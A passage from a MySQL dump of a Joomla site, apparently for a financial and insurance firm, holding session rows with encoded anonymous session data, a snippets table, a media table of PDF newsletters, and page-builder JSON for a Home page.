gAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODQxNDQ4MTtzOjQ6Imxhc3QiO2k6MTY2ODQxNDQ4MTtzOjM6Im5vdyI7aToxNjY4NDE0NDgxO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),('m6u9o8j5e0il6c3iqfemgf4f3i',0,1,1668008336,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODAwODMzNjtzOjQ6Imxhc3QiO2k6MTY2ODAwODMzNjtzOjM6Im5vdyI7aToxNjY4MDA4MzM2O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),('mh8u48tfkcse1n7s660e6clhhr',0,1,1668826330,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODgyNjMzMDtzOjQ6Imxhc3QiO2k6MTY2ODgyNjMzMDtzOjM6Im5vdyI7aToxNjY4ODI2MzMwO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),('mte53dmu92j4vmplo7r6ufnp2t',0,1,1668008335,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODAwODMzNTtzOjQ6Imxhc3QiO2k6MTY2ODAwODMzNTtzOjM6Im5vdyI7aToxNjY4MDA4MzM1O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),('n18ij88qhd9atft12oqqne0hhj',0,1,1667961502,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2Nzk2MTUwMTtzOjQ6Imxhc3QiO2k6MTY2Nzk2MTUwMTtzOjM6Im5vdyI7aToxNjY3OTYxNTAxO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),('nadjbrtu6dciusrvmrerbj6e9k',0,1,1668973259,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODk3MzI1OTtzOjQ6Imxhc3QiO2k6MTY2ODk3MzI1OTtzOjM6Im5vdyI7aToxNjY4OTczMjU5O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),('p2meijkhirmmfmfb4bpjs1m38p',0,1,1668027516,'joomla|s:736:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODAyNzQ2MDtzOjQ6Imxhc3QiO2k6MTY2ODAyNzQ2MDtzOjM6Im5vdyI7aToxNjY4MDI3NDYwO31zOjU6InRva2VuIjtzOjMyOiJYUEtxQjR4UXlLUnYyNVVLdW1NWFBUTzd5VW9xOTZyUSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),('pdit7u3350o8bqe68p58eqf9rf',0,1,1668929793,'joomla|s:860:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToyO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODkyOTc2OTtzOjQ6Imxhc3QiO2k6MTY2ODkyOTc2OTtzOjM6Im5vdyI7aToxNjY4OTI5Nzg5O31zOjU6InRva2VuIjtzOjMyOiJoSnA5QVk1aTlBZzVBZk83d2hhN3VTZUI1bkZYanFTVCI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjEzOiJjb21faW5zdGFsbGVyIjtPOjg6InN0ZENsYXNzIjoyOntzOjc6Im1lc3NhZ2UiO3M6MDoiIjtzOjE3OiJleHRlbnNpb25fbWVzc2FnZSI7czowOiIiO319czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),('phklst86jk570s074o0vn7ku01',0,1,1668600453,'joomla|s:736:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToyO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODYwMDA5MDtzOjQ6Imxhc3QiO2k6MTY2ODYwMDA5MDtzOjM6Im5vdyI7aToxNjY4NjAwNDUxO31zOjU6InRva2VuIjtzOjMyOiJ4WW9reEQ4SjZ1d3NydE9GQVVMRDY3YTNVeFdOcFp6RSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),('qj4hcc718air01rr0dt60475b8',0,1,1668301496,'joomla|s:860:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODMwMTQ5MTtzOjQ6Imxhc3QiO2k6MTY2ODMwMTQ5MTtzOjM6Im5vdyI7aToxNjY4MzAxNDkxO31zOjU6InRva2VuIjtzOjMyOiJUY2psaEhVZ09NSWY2cHdzOEJaN20zRFZzMVByeTQyNyI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjEzOiJjb21faW5zdGFsbGVyIjtPOjg6InN0ZENsYXNzIjoyOntzOjc6Im1lc3NhZ2UiO3M6MDoiIjtzOjE3OiJleHRlbnNpb25fbWVzc2FnZSI7czowOiIiO319czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),('stqk8l6dnre5lvat7kohah9jq0',0,1,1668973260,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODk3MzI1OTtzOjQ6Imxhc3QiO2k6MTY2ODk3MzI1OTtzOjM6Im5vdyI7aToxNjY4OTczMjU5O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),('ti23140a30j47n1unofqa1a8un',0,1,1669189664,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2OTE4OTY2MztzOjQ6Imxhc3QiO2k6MTY2OTE4OTY2MztzOjM6Im5vdyI7aToxNjY5MTg5NjYzO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),('uem1eslvvpu1uh4cv4ii6q7k9m',0,1,1668414494,'joomla|s:860:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODQxNDQ4NztzOjQ6Imxhc3QiO2k6MTY2ODQxNDQ4NztzOjM6Im5vdyI7aToxNjY4NDE0NDg3O31zOjU6InRva2VuIjtzOjMyOiJ4T1VUU3ZMSXRqNXl2RFBUTnBad2FDWUFSallDMzFLSSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjoxOntzOjEzOiJjb21faW5zdGFsbGVyIjtPOjg6InN0ZENsYXNzIjoyOntzOjc6Im1lc3NhZ2UiO3M6MDoiIjtzOjE3OiJleHRlbnNpb25fbWVzc2FnZSI7czowOiIiO319czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";',0,''),('vh6bd0mpieob84qgnge2e1anj7',0,1,1668047754,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2ODA0Nzc1MTtzOjQ6Imxhc3QiO2k6MTY2ODA0Nzc1MTtzOjM6Im5vdyI7aToxNjY4MDQ3NzUxO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,'');
/*!40000 ALTER TABLE `vzx9b_session` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_snippets`
--
DROP TABLE IF EXISTS `vzx9b_snippets`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_snippets` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`alias` varchar(100) NOT NULL,
`name` varchar(100) NOT NULL,
`description` text NOT NULL,
`category` varchar(50) NOT NULL,
`content` text NOT NULL,
`params` text NOT NULL,
`published` tinyint(1) NOT NULL DEFAULT 0,
`ordering` int(11) NOT NULL DEFAULT 0,
`checked_out` int(11) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`id`),
KEY `id` (`id`,`published`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_snippets`
--
LOCK TABLES `vzx9b_snippets` WRITE;
/*!40000 ALTER TABLE `vzx9b_snippets` DISABLE KEYS */;
INSERT INTO `vzx9b_snippets` VALUES (1,'contactdetails','Contact Details','','',' ','{\"category_select\":\"\"}',1,0,0,'0000-00-00 00:00:00');
/*!40000 ALTER TABLE `vzx9b_snippets` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_spmedia`
--
DROP TABLE IF EXISTS `vzx9b_spmedia`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_spmedia` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`path` varchar(255) NOT NULL,
`thumb` varchar(255) NOT NULL,
`alt` varchar(255) NOT NULL,
`caption` varchar(2048) NOT NULL,
`description` mediumtext NOT NULL,
`type` varchar(100) NOT NULL DEFAULT 'image',
`media_attr` varchar(5120) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '{}',
`extension` varchar(100) NOT NULL,
`created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` bigint(20) NOT NULL DEFAULT 0,
`modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_spmedia`
--
LOCK TABLES `vzx9b_spmedia` WRITE;
/*!40000 ALTER TABLE `vzx9b_spmedia` DISABLE KEYS */;
INSERT INTO `vzx9b_spmedia` VALUES (1,'finacial-informer-1st-quarter-2017','media/attachments/2017/02/22/finacial-informer-1st-quarter-2017.pdf','','finacial-informer-1st-quarter-2017','','','attachment','{}','com_sppagebuilder','2017-02-22 09:36:32',309,'0000-00-00 00:00:00',0),(2,'smith-and-smith-financial-informer','media/attachments/2017/08/02/smith-and-smith-financial-informer.pdf','','smith-and-smith-financial-informer','','','attachment','{}','com_sppagebuilder','2017-08-02 11:39:11',309,'0000-00-00 00:00:00',0),(3,'smith-smiths-financial-informer---4th-quarter-2018','media/attachments/2018/10/21/smith-smiths-financial-informer---4th-quarter-2018.pdf','','smith-smiths-financial-informer---4th-quarter-2018','','','attachment','{}','com_sppagebuilder','2018-10-21 17:53:07',309,'0000-00-00 00:00:00',0),(5,'mohamed-masaau-nff5-g6cfwy-unsplash','images/2020/04/23/mohamed-masaau-nff5-g6cfwy-unsplash.jpg','images/2020/04/23/_spmedia_thumbs/mohamed-masaau-nff5-g6cfwy-unsplash.jpg','mohamed-masaau-nff5-g6cfwy-unsplash','','','image','{}','com_sppagebuilder','2020-04-23 12:43:24',310,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `vzx9b_spmedia` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_sppagebuilder`
--
DROP TABLE IF EXISTS `vzx9b_sppagebuilder`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_sppagebuilder` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`asset_id` int(11) NOT NULL,
`title` varchar(255) NOT NULL,
`text` mediumtext NOT NULL,
`extension` varchar(255) NOT NULL DEFAULT 'com_sppagebuilder',
`extension_view` varchar(255) NOT NULL DEFAULT 'page',
`view_id` bigint(20) NOT NULL,
`active` tinyint(1) NOT NULL DEFAULT 0,
`published` tinyint(3) NOT NULL DEFAULT 1,
`catid` int(10) NOT NULL,
`access` int(10) NOT NULL DEFAULT 0,
`ordering` int(11) NOT NULL,
`created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` bigint(20) NOT NULL DEFAULT 0,
`modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` bigint(20) NOT NULL DEFAULT 0,
`checked_out` int(10) NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`attribs` varchar(5120) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '[]',
`og_title` varchar(255) NOT NULL,
`og_image` varchar(255) NOT NULL,
`og_description` varchar(255) NOT NULL,
`language` char(7) NOT NULL,
`hits` bigint(20) NOT NULL DEFAULT 0,
`css` longtext NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=14 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_sppagebuilder`
--
LOCK TABLES `vzx9b_sppagebuilder` WRITE;
/*!40000 ALTER TABLE `vzx9b_sppagebuilder` DISABLE KEYS */;
INSERT INTO `vzx9b_sppagebuilder` VALUES (1,230,'Home','[{\"layout\":12,\"settings\":{\"title\":\"\",\"heading_selector\":\"h1\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"inherit\",\"background_position\":\"50% 50%\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"0 0 0 0\",\"margin\":\"0 0 0 0\",\"fullscreen\":1,\"title_fontweight\":\"\"},\"id\":1487756075,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-12\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeIn\",\"animationduration\":5000,\"animationdelay\":0,\"class\":\"hidden-xs\"},\"id\":1487756076,\"addons\":[{\"type\":\"content\",\"name\":\"module\",\"title\":\"Joomla Module\",\"id\":1487756077,\"settings\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"module_type\":\"module\",\"id\":\"110\",\"position\":\"\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1}],\"collapse\":\"\",\"title\":\"Row\"},{\"layout\":\"4,4,4\",\"settings\":{\"fullscreen\":0,\"margin\":\"25px 0 0 0\",\"padding\":\"0 0 0 0\",\"class\":\"hidden-xs\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"id\":1487756078,\"visibility\":1,\"columns\":[{\"class_name\":\"col-sm-4\",\"settings\":{\"class\":\"\",\"animationdelay\":0,\"animationduration\":3000,\"animation\":\"fadeIn\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"id\":1487756079,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1487756080,\"settings\":{\"admin_label\":\"3 Panel Services\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"image01 blockzoom\\\"><div class=\\\"blockinner\\\"><div class=\\\"blocktitle\\\">INSURANCE</div><div class=\\\"blocktext\\\">Risk cover wherever you need it – from household insurance to business insurance and life assurance, we tailor our services to your needs. You can focus on your life and your business, knowing that we’ve got your back.</div><div class=\\\"blockbutton\\\"><a href=\\\"index.php/smith-and-smith-personal-solutions\\\" data-mce-href=\\\"index.php/smith-and-smith-personal-solutions\\\">Read More</a><br data-mce-bogus=\\\"1\\\"></div></div></div>\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"visibility\":1}],\"visibility\":1},{\"class_name\":\"col-sm-4\",\"settings\":{\"class\":\"\",\"animationdelay\":1000,\"animationduration\":3000,\"animation\":\"fadeIn\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"id\":1487756081,\"addons\":[{\"type\":\"content\",\"name\":\"text_block\",\"title\":\"Text Block\",\"id\":1487756082,\"settings\":{\"admin_label\":\"3 Panel 